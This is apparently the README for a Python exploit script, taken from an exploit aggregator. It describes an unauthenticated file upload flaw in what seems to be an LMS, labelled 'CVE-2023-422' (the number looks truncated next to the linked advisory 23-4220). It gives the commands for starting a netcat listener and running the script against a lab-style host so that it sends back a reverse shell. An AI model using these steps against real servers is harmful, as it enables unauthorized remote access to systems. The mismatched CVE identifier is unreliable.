Share
## https://sploitus.com/exploit?id=1018C02F-C5D3-53CF-93A9-A19F7709F52A
# Prerequisites

```
pip install requests
```

# Information

The python script uses the vulnerability [CVE-2023-422](https://starlabs.sg/advisories/23/23-4220/) to upload a file into the server and uses that file to send a reverse shell to the netcat listener and all this can be done without being authenticated. However, you will need to follow the following steps to successfully use the python script.

**Start netcat listener:**

```bash
nc -lnvp 4444
```

**Executing Python Script (Example):**

```bash
python3 main.py -u "http://lms.permx.htb" -p "80" -ni "10.10.16.24" -np "4445"
```

# More...

Please leave a star if the following exploit was useful :)